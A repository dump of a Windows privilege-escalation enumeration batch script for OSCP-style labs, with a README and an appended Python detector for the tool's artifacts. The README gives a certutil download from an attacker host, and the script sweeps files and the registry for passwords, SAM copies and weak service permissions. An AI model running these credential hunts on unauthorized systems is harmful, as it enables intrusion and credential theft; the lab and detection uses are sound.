├── README.md
└── windowsprivchecker.bat

/README.md:
--------------------------------------------------------------------------------
# Windows Priv Checker
A Windows privilege escalation (enumeration) script designed with OSCP labs (i.e. legacy Windows machines without PowerShell) in mind. The script is a conglomeration of privilege escalation checks gathered from various sources, all performed with native Windows binaries present in almost every version of Windows.

Note, the batch file also operates on the latest versions of Windows. PowerShell is not necessary to achieve proper OS enumeration.

# Use
Copy the batch file from your attacker machine to a user-writeable directory on the victim machine (typically the current user's folder, the "public" user folder, or C:\\Windows\\Temp will be writeable).

Also (although the script will run without it), it is recommended you copy (an older version of) accesschk.exe to the same location. An older version of accesschk.exe is recommended because the latest version will not work on some older Windows machines. The archived version here worked well in my experience (thanks, g0tmi1k): https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe

There are many ways to copy over files. I found certutil.exe to be the most reliable across Windows editions. For example:

certutil.exe -urlcache -split -f "http://$IP/Powerless.bat" Powerless.bat

The script may generate a lot of output. My recommended approach is to go through it sequentially, making a list of 'interesting' things to look at and sorting them as you go. Once you've reached the end of the output, go through your list in order of what stuck out the most.

You will do yourself a great disservice if you lean heavily on kernel exploits at the expense of thorough Windows enumeration.
Although you may find that kernel exploits often work in the labs, try to find other avenues as well.

# Sources
- http://www.fuzzysecurity.com/tutorials/16.html
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
- https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
- https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
- https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
--------------------------------------------------------------------------------
/windowsprivchecker.bat:
--------------------------------------------------------------------------------
@echo off
REM Remember where the script (and accesschk.exe, if present) lives, then work from the drive root
set cwd=%cd%
mode con:cols=160 lines=9999
cd c:\

echo ====================
echo WINDOWS PRIV CHECKER
echo ====================
echo.


echo [*] GETTING BASIC SYSTEM INFO
echo.

echo [+] systeminfo (use output with https://github.com/bitsadmin/wesng)
systeminfo
echo.

echo [+] Patch Information
wmic qfe get Caption,Description,HotFixID,InstalledOn
echo.

echo [+] Processor Information
SET Processor
echo.

echo [+] Domain Information
set user
echo.

echo [+] PATH INFORMATION
echo %path%
echo.


echo [*] NETWORK INFORMATION
echo.

echo [+] Interfaces
ipconfig /all
echo.

echo [+] Netstat
netstat -ano
echo.

echo [+] FIREWALL
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall dump
echo.

echo [+] Route
route print
echo.

echo [+] ARP
arp -a
echo.


echo [*] GETTING FILESYSTEM INFO
echo.

echo [+] Enumerating Additional Drives
REM C: is skipped here; every other drive letter is probed and missing drives are silenced
for %%i in (a b d e f g h i j k l m n o p q r s t u v w x y z) do @dir %%i: 2>nul
echo.

echo [+] Network shares
echo.
net share
echo.

echo [+] Scheduled Tasks
schtasks /query /fo LIST /v | findstr "TaskName Author: Run: User:"
echo.


echo [*] ENUMERATING USER AND ENVIRONMENTAL INFO...
echo.

echo [+] Administrators
net localgroup administrators
echo.

echo [+] Environment
set
echo.

echo [+] All Users / Accounts / Groups
net users
net accounts
net localgroup
echo.

echo [+] Current User
echo Current User: %username%
whoami /all
echo.


echo [*] ENUMERATING FILE AND DIRECTORY PERMISSIONS / CONTENTS
REM Pre-accept the Sysinternals EULA so accesschk.exe runs without an interactive prompt
reg.exe ADD "HKCU\Software\Sysinternals\AccessChk" /v EulaAccepted /t REG_DWORD /d 1 /f
echo.
REM accesschk.exe is expected next to the script (see README), so switch back to that directory
cd %cwd%

echo [+] World Writable Files and Directories
accesschk.exe -uwdqs "Users" "c:\*" /accepteula
accesschk.exe -uwdqs "Authenticated Users" "c:\*" /accepteula
accesschk.exe -uwdqs "Everyone" "c:\*" /accepteula
accesschk.exe -uwqs "Users" * /accepteula
accesschk.exe -uwqs "Authenticated Users" * /accepteula
accesschk.exe -uwqs "Everyone" * /accepteula
cd C:\
echo.

echo [+] World Writable Program Files and User Directories (icacls)
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
icacls "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
icacls "C:\Users\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Users\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Users\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Users\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
icacls "C:\Documents and Settings\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users"
icacls "C:\Users\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users"
echo.

echo [+] World Writable Program Files and User Directories (cacls for older versions of Windows)
cacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
cacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
cacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
cacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
cacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
cacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone"
cacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
cacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
cacls "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "Everyone"
cacls "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "Everyone"
cacls "C:\Documents and Settings\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
cacls "C:\Documents and Settings\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
cacls "C:\Users\*" 2>nul | findstr "(F)" | findstr "Everyone"
cacls "C:\Users\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
cacls "C:\Users\*" 2>nul | findstr "(M)" | findstr "Everyone"
cacls "C:\Users\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
cacls "C:\Documents and Settings\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users"
cacls "C:\Users\*" /T 2>nul | findstr ":F" | findstr "BUILTIN\Users"
echo.

echo [+] Checking if Administrator's directory is accessible
dir "C:\Users\Administrator"
dir "C:\Documents and Settings\Administrator"
echo.

echo [+] Contents of User Directories
dir "C:\Users\" /a /b /s 2>nul | findstr /v /i "Favorites\\" | findstr /v /i "AppData\\" | findstr /v /i "Microsoft\\" | findstr /v /i "Application Data\\"
dir "C:\Documents and Settings\" /a /b /s 2>nul | findstr /v /i "Favorites\\" | findstr /v /i "AppData\\" | findstr /v /i "Microsoft\\" | findstr /v /i "Application Data\\"
echo.

echo [+] Contents of C:\
dir "C:\" /b
echo.

echo [+] Contents of C:\Program Files
dir "C:\Program Files" /b
echo.

echo [+] Contents of C:\Program Files (x86)
dir "C:\Program Files (x86)" /b
echo.

echo [+] Contents of C:\inetpub\
dir /a /b C:\inetpub\
echo.


echo [*] SEARCHING FOR CONFIGURATION AND SENSITIVE FILES
echo.

echo [+] Searching for common config files
dir /s /b php.ini httpd.conf httpd-xampp.conf my.ini my.cnf web.config
echo.

echo [+] Contents of applicationHost.config
type C:\Windows\System32\inetsrv\config\applicationHost.config 2>nul
echo.

echo [+] Searching for unattend / sysprep files
dir /b /s unattended.xml* sysprep.xml* sysprep.inf* unattend.xml*
echo.

echo [+] Enumerating stored passwords
cmdkey /list
echo.

echo [+] Checking for accessible SAM / SYSTEM files
dir %SYSTEMROOT%\repair\SAM 2>nul
dir %SYSTEMROOT%\System32\config\RegBack\SAM 2>nul
dir %SYSTEMROOT%\System32\config\SAM 2>nul
dir %SYSTEMROOT%\repair\system 2>nul
dir %SYSTEMROOT%\System32\config\SYSTEM 2>nul
dir %SYSTEMROOT%\System32\config\RegBack\system 2>nul
dir /a /b /s SAM.b*
echo.

echo [+] Searching for vnc, kdbx, and rdp files
dir /a /s /b *.kdbx *vnc.ini *.rdp
echo.

echo [+] Searching for possible password files
dir /s /b *pass* *cred* *vnc* *.config*
echo.

echo [+] Searching for files containing passwords
start /b findstr /sim password *.xml *.ini *.txt *.config *.bak 2>nul
echo.


echo [*] REGISTRY CHECKS
echo.

echo [+] Searching registry for passwords
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
reg query HKLM /f password /t REG_SZ /s /k
reg query HKCU /f password /t REG_SZ /s /k
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
echo.

echo [+] Checking for AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
echo.


echo [*] ENUMERATING PROCESSES AND APPLICATIONS
echo.

echo [+] Powershell version check
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
echo.

echo [+] Enumerating startup programs
wmic startup get caption,command
echo.

echo [+] Current processes
tasklist /v
echo.

echo [+] Current processes with services
tasklist /SVC
echo.

echo [+] Searching for Apache / Xampp
dir /s /b apache* xampp*
echo.


echo [*] SERVICE CHECKS
echo.
cd %cwd%

echo [+] Finding Unquoted Service Paths
REM Auto-start services outside C:\Windows whose path contains no double quote
wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """
REM Same check via sc, for hosts where wmic is unavailable; temp files are written next to the script and removed afterwards
sc query state= all > scoutput.txt
findstr "SERVICE_NAME:" scoutput.txt > Servicenames.txt
FOR /F "tokens=2 delims= " %%i in (Servicenames.txt) DO @echo %%i >> services.txt
FOR /F %%i in (services.txt) DO @sc qc %%i | findstr "BINARY_PATH_NAME" >> path.txt
find /v """" path.txt > unquotedpaths.txt
sort unquotedpaths.txt|findstr /i /v C:\WINDOWS
del /f Servicenames.txt
del /f services.txt
del /f path.txt
del /f scoutput.txt
del /f unquotedpaths.txt
echo.

echo [+] Finding services with weak permissions
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv "Everyone" * /accepteula
accesschk.exe -uwcqv "Users" * /accepteula
echo.

echo [+] Finding services with modifiable registry values
accesschk.exe -kvqwsu "Authenticated Users" hklm\system\currentcontrolset\services /accepteula
accesschk.exe -kvqwsu "Users" hklm\system\currentcontrolset\services /accepteula
accesschk.exe -kvqwsu "Everyone" hklm\system\currentcontrolset\services /accepteula
echo.

echo [+] Currently running services
net start
echo.
--------------------------------------------------------------------------------
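As an added defender-side example (not part of this repository), the Python below matches process-creation command lines against the artifacts this tool leaves behind: the certutil -urlcache download the README recommends, the AccessChk EulaAccepted registry write, and the accesschk write-permission sweeps. The log records are constructed samples and the rule names are my own.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 / Security 4688 style).
# These are made-up records for the example, not output from any real host.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": 'certutil.exe -urlcache -split -f "http://10.0.0.5/Powerless.bat" Powerless.bat'},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg.exe ADD "HKCU\Software\Sysinternals\AccessChk" /v EulaAccepted /t REG_DWORD /d 1 /f'},
    {"Image": r"C:\Users\Public\accesschk.exe",
     "CommandLine": 'accesschk.exe -uwcqv "Authenticated Users" * /accepteula'},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -verify signed.cer"},            # benign certutil use
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg.exe query "HKCU\Console" /v QuickEdit'},  # benign reg use
]

# Each rule is (name, regex over the command line). Case-insensitive because cmd.exe
# tools accept switches in any case and the batch script itself mixes them.
RULES = [
    # certutil fetching a URL into its cache: the README's recommended file-drop method
    ("certutil_urlcache_download",
     re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*\bhttps?://", re.I)),
    # Silent EULA acceptance written to HKCU\Software\Sysinternals\<tool> before first use
    ("sysinternals_eula_registry_write",
     re.compile(r'\breg(\.exe)?\s+add\s+"?HK(CU|LM)\\Software\\Sysinternals\\.*\bEulaAccepted\b', re.I)),
    # accesschk with a 'w' in its switch cluster: a sweep for objects writable by some principal
    ("accesschk_write_permission_sweep",
     re.compile(r"\baccesschk(\.exe)?\s+-[a-z]*w[a-z]*\s", re.I)),
]


def match_event(event):
    """Return the names of every rule whose regex matches this event's command line."""
    cmd = event.get("CommandLine", "")
    return [name for name, rx in RULES if rx.search(cmd)]


def triage(events):
    """Group triggering command lines by rule name; events matching nothing are dropped."""
    hits = {}
    for ev in events:
        for name in match_event(ev):
            hits.setdefault(name, []).append(ev["CommandLine"])
    return hits


if __name__ == "__main__":
    for rule, cmds in triage(SAMPLE_EVENTS).items():
        print(rule, "->", cmds)
```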